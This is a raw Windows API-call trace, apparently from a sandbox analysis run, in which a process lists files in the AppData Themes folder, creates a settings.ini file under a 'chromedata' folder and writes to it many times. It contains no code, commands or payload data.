	[0102.373] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\AppData\\Roaming\\\\Microsoft\\\\Windows\\\\Themes\\\\*", lpFindFileData=0x126e90 | out: lpFindFileData=0x126e90*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xa0a61060, ftCreationTime.dwHighDateTime=0x1d348d5, ftLastAccessTime.dwLowDateTime=0xa0bb7cc0, ftLastAccessTime.dwHighDateTime=0x1d348d5, ftLastWriteTime.dwLowDateTime=0x7ebc3f9f, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x213b30
	[0102.374] lstrcmpiW (lpString1=".", lpString2=".") returned 0
	[0102.374] FindNextFileW (in: hFindFile=0x213b30, lpFindFileData=0x126e90 | out: lpFindFileData=0x126e90*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xa0a61060, ftCreationTime.dwHighDateTime=0x1d348d5, ftLastAccessTime.dwLowDateTime=0xa0bb7cc0, ftLastAccessTime.dwHighDateTime=0x1d348d5, ftLastWriteTime.dwLowDateTime=0x7ebc3f9f, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1
	[0102.374] lstrcmpiW (lpString1="..", lpString2=".") returned 1
	[0102.374] lstrcmpiW (lpString1="..", lpString2="..") returned 0
	[0102.374] FindNextFileW (in: hFindFile=0x213b30, lpFindFileData=0x126e90 | out: lpFindFileData=0x126e90*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xa0ad3480, ftCreationTime.dwHighDateTime=0x1d348d5, ftLastAccessTime.dwLowDateTime=0xa0ad3480, ftLastAccessTime.dwHighDateTime=0x1d348d5, ftLastWriteTime.dwLowDateTime=0x7ebc3f9f, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x9b944, dwReserved0=0x0, dwReserved1=0x0, cFileName="TranscodedWallpaper.jpg", cAlternateFileName="TRANSC~1.JPG")) returned 1
	[0102.374] FindNextFileW (in: hFindFile=0x213b30, lpFindFileData=0x126e90 | out: lpFindFileData=0x126e90*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xa0ad3480, ftCreationTime.dwHighDateTime=0x1d348d5, ftLastAccessTime.dwLowDateTime=0xa0ad3480, ftLastAccessTime.dwHighDateTime=0x1d348d5, ftLastWriteTime.dwLowDateTime=0x7ebc3f9f, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x9b944, dwReserved0=0x0, dwReserved1=0x0, cFileName="TranscodedWallpaper.jpg", cAlternateFileName="TRANSC~1.JPG")) returned 0
	[0102.374] FindClose (in: hFindFile=0x213b30 | out: hFindFile=0x213b30) returned 1
	[0102.374] FindNextFileW (in: hFindFile=0x213af0, lpFindFileData=0x127910 | out: lpFindFileData=0x127910*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xa0a61060, ftCreationTime.dwHighDateTime=0x1d348d5, ftLastAccessTime.dwLowDateTime=0xa0bb7cc0, ftLastAccessTime.dwHighDateTime=0x1d348d5, ftLastWriteTime.dwLowDateTime=0x7ebc3f9f, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Themes", cAlternateFileName="")) returned 0
	[0102.374] FindClose (in: hFindFile=0x213af0 | out: hFindFile=0x213af0) returned 1
	[0102.374] FindNextFileW (in: hFindFile=0x213a70, lpFindFileData=0x128390 | out: lpFindFileData=0x128390*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xfa086aac, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0xa0a871c0, ftLastAccessTime.dwHighDateTime=0x1d348d5, ftLastWriteTime.dwLowDateTime=0x89642899, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Windows", cAlternateFileName="")) returned 0
	[0102.374] FindClose (in: hFindFile=0x213a70 | out: hFindFile=0x213a70) returned 1
	[0102.374] FindNextFileW (in: hFindFile=0x213ab0, lpFindFileData=0x128e10 | out: lpFindFileData=0x128e10*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0xfa086aac, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0xa0a871c0, ftLastAccessTime.dwHighDateTime=0x1d348d5, ftLastWriteTime.dwLowDateTime=0xa23a2415, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x128e48, dwReserved1=0x75c5c361, cFileName="Microsoft", cAlternateFileName="MICROS~1")) returned 0
	[0102.374] FindClose (in: hFindFile=0x213ab0 | out: hFindFile=0x213ab0) returned 1
	[0102.374] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x24c2a8
	[0102.374] CreateFileW (lpFileName="settings.ini" (normalized: "c:\\users\\2xc7u663gxwc\\appdata\\roaming\\chromedata\\settings.ini"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x258
	[0102.375] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x24d088
	[0102.375] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x1000) returned 0x24da38
	[0102.375] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x24d0a0
	[0102.375] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10000) returned 0x24ea40
	[0102.376] WriteFile (in: hFile=0x258, lpBuffer=0x128924*, nNumberOfBytesToWrite=0xc, lpNumberOfBytesWritten=0x128910, lpOverlapped=0x0 | out: lpBuffer=0x128924*, lpNumberOfBytesWritten=0x128910*=0xc, lpOverlapped=0x0) returned 1
	[0102.377] WriteFile (in: hFile=0x258, lpBuffer=0x128900*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x128910, lpOverlapped=0x0 | out: lpBuffer=0x128900*, lpNumberOfBytesWritten=0x128910*=0x2, lpOverlapped=0x0) returned 1
	[0102.377] WriteFile (in: hFile=0x258, lpBuffer=0x128924*, nNumberOfBytesToWrite=0x24, lpNumberOfBytesWritten=0x128910, lpOverlapped=0x0 | out: lpBuffer=0x128924*, lpNumberOfBytesWritten=0x128910*=0x24, lpOverlapped=0x0) returned 1
	[0102.377] WriteFile (in: hFile=0x258, lpBuffer=0x128900*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x128910, lpOverlapped=0x0 | out: lpBuffer=0x128900*, lpNumberOfBytesWritten=0x128910*=0x2, lpOverlapped=0x0) returned 1
	[0102.378] WriteFile (in: hFile=0x258, lpBuffer=0x128924*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x128910, lpOverlapped=0x0 | out: lpBuffer=0x128924*, lpNumberOfBytesWritten=0x128910*=0x30, lpOverlapped=0x0) returned 1
	[0102.378] WriteFile (in: hFile=0x258, lpBuffer=0x128900*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x128910, lpOverlapped=0x0 | out: lpBuffer=0x128900*, lpNumberOfBytesWritten=0x128910*=0x2, lpOverlapped=0x0) returned 1
	[0102.378] WriteFile (in: hFile=0x258, lpBuffer=0x128924*, nNumberOfBytesToWrite=0x44, lpNumberOfBytesWritten=0x128910, lpOverlapped=0x0 | out: lpBuffer=0x128924*, lpNumberOfBytesWritten=0x128910*=0x44, lpOverlapped=0x0) returned 1
	[0102.378] WriteFile (in: hFile=0x258, lpBuffer=0x128900*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x128910, lpOverlapped=0x0 | out: lpBuffer=0x128900*, lpNumberOfBytesWritten=0x128910*=0x2, lpOverlapped=0x0) returned 1
	[0102.379] WriteFile (in: hFile=0x258, lpBuffer=0x128924*, nNumberOfBytesToWrite=0x41, lpNumberOfBytesWritten=0x128910, lpOverlapped=0x0 | out: lpBuffer=0x128924*, lpNumberOfBytesWritten=0x128910*=0x41, lpOverlapped=0x0) returned 1
	[0102.379] WriteFile (in: hFile=0x258, lpBuffer=0x128900*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x128910, lpOverlapped=0x0 | out: lpBuffer=0x128900*, lpNumberOfBytesWritten=0x128910*=0x2, lpOverlapped=0x0) returned 1
	[0102.379] WriteFile (in: hFile=0x258, lpBuffer=0x128924*, nNumberOfBytesToWrite=0x2b, lpNumberOfBytesWritten=0x128910, lpOverlapped=0x0 | out: lpBuffer=0x128924*, lpNumberOfBytesWritten=0x128910*=0x2b, lpOverlapped=0x0) returned 1
	[0102.379] WriteFile (in: hFile=0x258, lpBuffer=0x128900*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x128910, lpOverlapped=0x0 | out: lpBuffer=0x128900*, lpNumberOfBytesWritten=0x128910*=0x2, lpOverlapped=0x0) returned 1
	[0102.379] WriteFile (in: hFile=0x258, lpBuffer=0x128924*, nNumberOfBytesToWrite=0x47, lpNumberOfBytesWritten=0x128910, lpOverlapped=0x0 | out: lpBuffer=0x128924*, lpNumberOfBytesWritten=0x128910*=0x47, lpOverlapped=0x0) returned 1
	[0102.379] WriteFile (in: hFile=0x258, lpBuffer=0x128900*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x128910, lpOverlapped=0x0 | out: lpBuffer=0x128900*, lpNumberOfBytesWritten=0x128910*=0x2, lpOverlapped=0x0) returned 1
	[0102.380] WriteFile (in: hFile=0x258, lpBuffer=0x128924*, nNumberOfBytesToWrite=0x35, lpNumberOfBytesWritten=0x128910, lpOverlapped=0x0 | out: lpBuffer=0x128924*, lpNumberOfBytesWritten=0x128910*=0x35, lpOverlapped=0x0) returned 1
	[0102.380] WriteFile (in: hFile=0x258, lpBuffer=0x128900*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x128910, lpOverlapped=0x0 | out: lpBuffer=0x128900*, lpNumberOfBytesWritten=0x128910*=0x2, lpOverlapped=0x0) returned 1
	[0102.380] WriteFile (in: hFile=0x258, lpBuffer=0x128924*, nNumberOfBytesToWrite=0x4b, lpNumberOfBytesWritten=0x128910, lpOverlapped=0x0 | out: lpBuffer=0x128924*, lpNumberOfBytesWritten=0x128910*=0x4b, lpOverlapped=0x0) returned 1
	[0102.380] WriteFile (in: hFile=0x258, lpBuffer=0x128900*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x128910, lpOverlapped=0x0 | out: lpBuffer=0x128900*, lpNumberOfBytesWritten=0x128910*=0x2, lpOverlapped=0x0) returned 1
	[0102.380] WriteFile (in: hFile=0x258, lpBuffer=0x128924*, nNumberOfBytesToWrite=0x15, lpNumberOfBytesWritten=0x128910, lpOverlapped=0x0 | out: lpBuffer=0x128924*, lpNumberOfBytesWritten=0x128910*=0x15, lpOverlapped=0x0) returned 1
	[0102.381] WriteFile (in: hFile=0x258, lpBuffer=0x128900*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x128910, lpOverlapped=0x0 | out: lpBuffer=0x128900*, lpNumberOfBytesWritten=0x128910*=0x2, lpOverlapped=0x0) returned 1
	[0102.381] WriteFile (in: hFile=0x258, lpBuffer=0x128924*, nNumberOfBytesToWrite=0x3d, lpNumberOfBytesWritten=0x128910, lpOverlapped=0x0 | out: lpBuffer=0x128924*, lpNumberOfBytesWritten=0x128910*=0x3d, lpOverlapped=0x0) returned 1
	[0102.381] WriteFile (in: hFile=0x258, lpBuffer=0x128900*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x128910, lpOverlapped=0x0 | out: lpBuffer=0x128900*, lpNumberOfBytesWritten=0x128910*=0x2, lpOverlapped=0x0) returned 1
	[0102.381] WriteFile (in: hFile=0x258, lpBuffer=0x128924*, nNumberOfBytesToWrite=0x2d, lpNumberOfBytesWritten=0x128910, lpOverlapped=0x0 | out: lpBuffer=0x128924*, lpNumberOfBytesWritten=0x128910*=0x2d, lpOverlapped=0x0) returned 1
	[0102.381] WriteFile (in: hFile=0x258, lpBuffer=0x128900*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x128910, lpOverlapped=0x0 | out: lpBuffer=0x128900*, lpNumberOfBytesWritten=0x128910*=0x2, lpOverlapped=0x0) returned 1
	[0102.382] WriteFile (in: hFile=0x258, lpBuffer=0x128924*, nNumberOfBytesToWrite=0x29, lpNumberOfBytesWritten=0x128910, lpOverlapped=0x0 | out: lpBuffer=0x128924*, lpNumberOfBytesWritten=0x128910*=0x29, lpOverlapped=0x0) returned 1
	[0102.382] WriteFile (in: hFile=0x258, lpBuffer=0x128900*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x128910, lpOverlapped=0x0 | out: lpBuffer=0x128900*, lpNumberOfBytesWritten=0x128910*=0x2, lpOverlapped=0x0) returned 1
	[0102.382] WriteFile (in: hFile=0x258, lpBuffer=0x128924*, nNumberOfBytesToWrite=0x17, lpNumberOfBytesWritten=0x128910, lpOverlapped=0x0 | out: lpBuffer=0x128924*, lpNumberOfBytesWritten=0x128910*=0x17, lpOverlapped=0x0) returned 1
	[0102.382] WriteFile (in: hFile=0x258, lpBuffer=0x128900*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x128910, lpOverlapped=0x0 | out: lpBuffer=0x128900*, lpNumberOfBytesWritten=0x128910*=0x2, lpOverlapped=0x0) returned 1
	[0102.382] WriteFile (in: hFile=0x258, lpBuffer=0x128924*, nNumberOfBytesToWrite=0x53, lpNumberOfBytesWritten=0x128910, lpOverlapped=0x0 | out: lpBuffer=0x128924*, lpNumberOfBytesWritten=0x128910*=0x53, lpOverlapped=0x0) returned 1
	[0102.383] WriteFile (in: hFile=0x258, lpBuffer=0x128900*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x128910, lpOverlapped=0x0 | out: lpBuffer=0x128900*, lpNumberOfBytesWritten=0x128910*=0x2, lpOverlapped=0x0) returned 1
	[0102.383] WriteFile (in: hFile=0x258, lpBuffer=0x128924*, nNumberOfBytesToWrite=0x22, lpNumberOfBytesWritten=0x128910, lpOverlapped=0x0 | out: lpBuffer=0x128924*, lpNumberOfBytesWritten=0x128910*=0x22, lpOverlapped=0x0) returned 1
	[0102.383] WriteFile (in: hFile=0x258, lpBuffer=0x128900*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x128910, lpOverlapped=0x0 | out: lpBuffer=0x128900*, lpNumberOfBytesWritten=0x128910*=0x2, lpOverlapped=0x0) returned 1
	[0102.383] WriteFile (in: hFile=0x258, lpBuffer=0x128924*, nNumberOfBytesToWrite=0x18, lpNumberOfBytesWritten=0x128910, lpOverlapped=0x0 | out: lpBuffer=0x128924*, lpNumberOfBytesWritten=0x128910*=0x18, lpOverlapped=0x0) returned 1
	[0102.383] WriteFile (in: hFile=0x258, lpBuffer=0x128900*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x128910, lpOverlapped=0x0 | out: lpBuffer=0x128900*, lpNumberOfBytesWritten=0x128910*=0x2, lpOverlapped=0x0) returned 1
	[0102.383] WriteFile (in: hFile=0x258, lpBuffer=0x128924*, nNumberOfBytesToWrite=0x1f, lpNumberOfBytesWritten=0x128910, lpOverlapped=0x0 | out: lpBuffer=0x128924*, lpNumberOfBytesWritten=0x128910*=0x1f, lpOverlapped=0x0) returned 1
	[0102.384] WriteFile (in: hFile=0x258, lpBuffer=0x128900*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x128910, lpOverlapped=0x0 | out: lpBuffer=0x128900*, lpNumberOfBytesWritten=0x128910*=0x2, lpOverlapped=0x0) returned 1
	[0102.384] WriteFile (in: hFile=0x258, lpBuffer=0x128924*, nNumberOfBytesToWrite=0x31, lpNumberOfBytesWritten=0x128910, lpOverlapped=0x0 | out: lpBuffer=0x128924*, lpNumberOfBytesWritten=0x128910*=0x31, lpOverlapped=0x0) returned 1
	[0102.384] WriteFile (in: hFile=0x258, lpBuffer=0x128900*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x128910, lpOverlapped=0x0 | out: lpBuffer=0x128900*, lpNumberOfBytesWritten=0x128910*=0x2, lpOverlapped=0x0) returned 1
	[0102.384] WriteFile (in: hFile=0x258, lpBuffer=0x128924*, nNumberOfBytesToWrite=0x36, lpNumberOfBytesWritten=0x128910, lpOverlapped=0x0 | out: lpBuffer=0x128924*, lpNumberOfBytesWritten=0x128910*=0x36, lpOverlapped=0x0) returned 1
	[0102.384] WriteFile (in: hFile=0x258, lpBuffer=0x128900*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x128910, lpOverlapped=0x0 | out: lpBuffer=0x128900*, lpNumberOfBytesWritten=0x128910*=0x2, lpOverlapped=0x0) returned 1
	[0102.384] WriteFile (in: hFile=0x258, lpBuffer=0x128924*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x128910, lpOverlapped=0x0 | out: lpBuffer=0x128924*, lpNumberOfBytesWritten=0x128910*=0x26, lpOverlapped=0x0) returned 1
	[0102.385] WriteFile (in: hFile=0x258, lpBuffer=0x128900*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x128910, lpOverlapped=0x0 | out: lpBuffer=0x128900*, lpNumberOfBytesWritten=0x128910*=0x2, lpOverlapped=0x0) returned 1
	[0102.385] WriteFile (in: hFile=0x258, lpBuffer=0x128924*, nNumberOfBytesToWrite=0x39, lpNumberOfBytesWritten=0x128910, lpOverlapped=0x0 | out: lpBuffer=0x128924*, lpNumberOfBytesWritten=0x128910*=0x39, lpOverlapped=0x0) returned 1
	[0102.385] WriteFile (in: hFile=0x258, lpBuffer=0x128900*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x128910, lpOverlapped=0x0 | out: lpBuffer=0x128900*, lpNumberOfBytesWritten=0x128910*=0x2, lpOverlapped=0x0) returned 1
	[0102.385] WriteFile (in: hFile=0x258, lpBuffer=0x128924*, nNumberOfBytesToWrite=0x43, lpNumberOfBytesWritten=0x128910, lpOverlapped=0x0 | out: lpBuffer=0x128924*, lpNumberOfBytesWritten=0x128910*=0x43, lpOverlapped=0x0) returned 1
	[0102.385] WriteFile (in: hFile=0x258, lpBuffer=0x128900*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x128910, lpOverlapped=0x0 | out: lpBuffer=0x128900*, lpNumberOfBytesWritten=0x128910*=0x2, lpOverlapped=0x0) returned 1
	[0102.386] WriteFile (in: hFile=0x258, lpBuffer=0x128924*, nNumberOfBytesToWrite=0x24, lpNumberOfBytesWritten=0x128910, lpOverlapped=0x0 | out: lpBuffer=0x128924*, lpNumberOfBytesWritten=0x128910*=0x24, lpOverlapped=0x0) returned 1
	[0102.386] WriteFile (in: hFile=0x258, lpBuffer=0x128900*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x128910, lpOverlapped=0x0 | out: lpBuffer=0x128900*, lpNumberOfBytesWritten=0x128910*=0x2, lpOverlapped=0x0) returned 1
	[0102.386] WriteFile (in: hFile=0x258, lpBuffer=0x128924*, nNumberOfBytesToWrite=0x1d, lpNumberOfBytesWritten=0x128910, lpOverlapped=0x0 | out: lpBuffer=0x128924*, lpNumberOfBytesWritten=0x128910*=0x1d, lpOverlapped=0x0) returned 1
	[0102.386] WriteFile (in: hFile=0x258, lpBuffer=0x128900*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x128910, lpOverlapped=0x0 | out: lpBuffer=0x128900*, lpNumberOfBytesWritten=0x128910*=0x2, lpOverlapped=0x0) returned 1
	[0102.386] WriteFile (in: hFile=0x258, lpBuffer=0x128924*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x128910, lpOverlapped=0x0 | out: lpBuffer=0x128924*, lpNumberOfBytesWritten=0x128910*=0x50, lpOverlapped=0x0) returned 1
	[0102.386] WriteFile (in: hFile=0x258, lpBuffer=0x128900*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x128910, lpOverlapped=0x0 | out: lpBuffer=0x128900*, lpNumberOfBytesWritten=0x128910*=0x2, lpOverlapped=0x0) returned 1
	[0102.387] WriteFile (in: hFile=0x258, lpBuffer=0x128924*, nNumberOfBytesToWrite=0x21, lpNumberOfBytesWritten=0x128910, lpOverlapped=0x0 | out: lpBuffer=0x128924*, lpNumberOfBytesWritten=0x128910*=0x21, lpOverlapped=0x0) returned 1
	[0102.387] WriteFile (in: hFile=0x258, lpBuffer=0x128900*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x128910, lpOverlapped=0x0 | out: lpBuffer=0x128900*, lpNumberOfBytesWritten=0x128910*=0x2, lpOverlapped=0x0) returned 1
	[0102.387] WriteFile (in: hFile=0x258, lpBuffer=0x128924*, nNumberOfBytesToWrite=0x43, lpNumberOfBytesWritten=0x128910, lpOverlapped=0x0 | out: lpBuffer=0x128924*, lpNumberOfBytesWritten=0x128910*=0x43, lpOverlapped=0x0) returned 1
	[0102.387] WriteFile (in: hFile=0x258, lpBuffer=0x128900*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x128910, lpOverlapped=0x0 | out: lpBuffer=0x128900*, lpNumberOfBytesWritten=0x128910*=0x2, lpOverlapped=0x0) returned 1
	[0102.387] WriteFile (in: hFile=0x258, lpBuffer=0x128924*, nNumberOfBytesToWrite=0x11, lpNumberOfBytesWritten=0x128910, lpOverlapped=0x0 | out: lpBuffer=0x128924*, lpNumberOfBytesWritten=0x128910*=0x11, lpOverlapped=0x0) returned 1
	[0102.387] WriteFile (in: hFile=0x258, lpBuffer=0x128900*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x128910, lpOverlapped=0x0 | out: lpBuffer=0x128900*, lpNumberOfBytesWritten=0x128910*=0x2, lpOverlapped=0x0) returned 1
	[0102.388] WriteFile (in: hFile=0x258, lpBuffer=0x128924*, nNumberOfBytesToWrite=0x51, lpNumberOfBytesWritten=0x128910, lpOverlapped=0x0 | out: lpBuffer=0x128924*, lpNumberOfBytesWritten=0x128910*=0x51, lpOverlapped=0x0) returned 1
	[0102.388] WriteFile (in: hFile=0x258, lpBuffer=0x128900*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x128910, lpOverlapped=0x0 | out: lpBuffer=0x128900*, lpNumberOfBytesWritten=0x128910*=0x2, lpOverlapped=0x0) returned 1
	[0102.388] WriteFile (in: hFile=0x258, lpBuffer=0x128924*, nNumberOfBytesToWrite=0x24, lpNumberOfBytesWritten=0x128910, lpOverlapped=0x0 | out: lpBuffer=0x128924*, lpNumberOfBytesWritten=0x128910*=0x24, lpOverlapped=0x0) returned 1
	[0102.388] WriteFile (in: hFile=0x258, lpBuffer=0x128900*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x128910, lpOverlapped=0x0 | out: lpBuffer=0x128900*, lpNumberOfBytesWritten=0x128910*=0x2, lpOverlapped=0x0) returned 1
	[0102.388] WriteFile (in: hFile=0x258, lpBuffer=0x128924*, nNumberOfBytesToWrite=0x17, lpNumberOfBytesWritten=0x128910, lpOverlapped=0x0 | out: lpBuffer=0x128924*, lpNumberOfBytesWritten=0x128910*=0x17, lpOverlapped=0x0) returned 1
	[0102.388] WriteFile (in: hFile=0x258, lpBuffer=0x128900*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x128910, lpOverlapped=0x0 | out: lpBuffer=0x128900*, lpNumberOfBytesWritten=0x128910*=0x2, lpOverlapped=0x0) returned 1
	[0102.389] WriteFile (in: hFile=0x258, lpBuffer=0x128924*, nNumberOfBytesToWrite=0x55, lpNumberOfBytesWritten=0x128910, lpOverlapped=0x0 | out: lpBuffer=0x128924*, lpNumberOfBytesWritten=0x128910*=0x55, lpOverlapped=0x0) returned 1
	[0102.389] WriteFile (in: hFile=0x258, lpBuffer=0x128900*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x128910, lpOverlapped=0x0 | out: lpBuffer=0x128900*, lpNumberOfBytesWritten=0x128910*=0x2, lpOverlapped=0x0) returned 1
	[0102.389] WriteFile (in: hFile=0x258, lpBuffer=0x128924*, nNumberOfBytesToWrite=0x24, lpNumberOfBytesWritten=0x128910, lpOverlapped=0x0 | out: lpBuffer=0x128924*, lpNumberOfBytesWritten=0x128910*=0x24, lpOverlapped=0x0) returned 1
	[0102.389] WriteFile (in: hFile=0x258, lpBuffer=0x128900*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x128910, lpOverlapped=0x0 | out: lpBuffer=0x128900*, lpNumberOfBytesWritten=0x128910*=0x2, lpOverlapped=0x0) returned 1
	[0102.390] WriteFile (in: hFile=0x258, lpBuffer=0x128924*, nNumberOfBytesToWrite=0x3e, lpNumberOfBytesWritten=0x128910, lpOverlapped=0x0 | out: lpBuffer=0x128924*, lpNumberOfBytesWritten=0x128910*=0x3e, lpOverlapped=0x0) returned 1
	[0102.390] WriteFile (in: hFile=0x258, lpBuffer=0x128900*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x128910, lpOverlapped=0x0 | out: lpBuffer=0x128900*, lpNumberOfBytesWritten=0x128910*=0x2, lpOverlapped=0x0) returned 1
	[0102.390] WriteFile (in: hFile=0x258, lpBuffer=0x128924*, nNumberOfBytesToWrite=0x3d, lpNumberOfBytesWritten=0x128910, lpOverlapped=0x0 | out: lpBuffer=0x128924*, lpNumberOfBytesWritten=0x128910*=0x3d, lpOverlapped=0x0) returned 1
	[0102.390] WriteFile (in: hFile=0x258, lpBuffer=0x128900*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x128910, lpOverlapped=0x0 | out: lpBuffer=0x128900*, lpNumberOfBytesWritten=0x128910*=0x2, lpOverlapped=0x0) returned 1
	[0102.390] WriteFile (in: hFile=0x258, lpBuffer=0x128924*, nNumberOfBytesToWrite=0x29, lpNumberOfBytesWritten=0x128910, lpOverlapped=0x0 | out: lpBuffer=0x128924*, lpNumberOfBytesWritten=0x128910*=0x29, lpOverlapped=0x0) returned 1
	[0102.391] WriteFile (in: hFile=0x258, lpBuffer=0x128900*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x128910, lpOverlapped=0x0 | out: lpBuffer=0x128900*, lpNumberOfBytesWritten=0x128910*=0x2, lpOverlapped=0x0) returned 1
	[0102.391] WriteFile (in: hFile=0x258, lpBuffer=0x128924*, nNumberOfBytesToWrite=0x48, lpNumberOfBytesWritten=0x128910, lpOverlapped=0x0 | out: lpBuffer=0x128924*, lpNumberOfBytesWritten=0x128910*=0x48, lpOverlapped=0x0) returned 1
	[0102.391] WriteFile (in: hFile=0x258, lpBuffer=0x128900*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x128910, lpOverlapped=0x0 | out: lpBuffer=0x128900*, lpNumberOfBytesWritten=0x128910*=0x2, lpOverlapped=0x0) returned 1
	[0102.391] WriteFile (in: hFile=0x258, lpBuffer=0x128924*, nNumberOfBytesToWrite=0x42, lpNumberOfBytesWritten=0x128910, lpOverlapped=0x0 | out: lpBuffer=0x128924*, lpNumberOfBytesWritten=0x128910*=0x42, lpOverlapped=0x0) returned 1
	[0102.391] WriteFile (in: hFile=0x258, lpBuffer=0x128900*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x128910, lpOverlapped=0x0 | out: lpBuffer=0x128900*, lpNumberOfBytesWritten=0x128910*=0x2, lpOverlapped=0x0) returned 1
	[0102.392] WriteFile (in: hFile=0x258, lpBuffer=0x128924*, nNumberOfBytesToWrite=0x4d, lpNumberOfBytesWritten=0x128910, lpOverlapped=0x0 | out: lpBuffer=0x128924*, lpNumberOfBytesWritten=0x128910*=0x4d, lpOverlapped=0x0) returned 1
	[0102.392] WriteFile (in: hFile=0x258, lpBuffer=0x128900*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x128910, lpOverlapped=0x0 | out: lpBuffer=0x128900*, lpNumberOfBytesWritten=0x128910*=0x2, lpOverlapped=0x0) returned 1
	[0102.392] WriteFile (in: hFile=0x258, lpBuffer=0x128924*, nNumberOfBytesToWrite=0x24, lpNumberOfBytesWritten=0x128910, lpOverlapped=0x0 | out: lpBuffer=0x128924*, lpNumberOfBytesWritten=0x128910*=0x24, lpOverlapped=0x0) returned 1
	[0102.392] WriteFile (in: hFile=0x258, lpBuffer=0x128900*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x128910, lpOverlapped=0x0 | out: lpBuffer=0x128900*, lpNumberOfBytesWritten=0x128910*=0x2, lpOverlapped=0x0) returned 1
	[0102.392] WriteFile (in: hFile=0x258, lpBuffer=0x128924*, nNumberOfBytesToWrite=0x3f, lpNumberOfBytesWritten=0x128910, lpOverlapped=0x0 | out: lpBuffer=0x128924*, lpNumberOfBytesWritten=0x128910*=0x3f, lpOverlapped=0x0) returned 1
	[0102.392] WriteFile (in: hFile=0x258, lpBuffer=0x128900*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x128910, lpOverlapped=0x0 | out: lpBuffer=0x128900*, lpNumberOfBytesWritten=0x128910*=0x2, lpOverlapped=0x0) returned 1
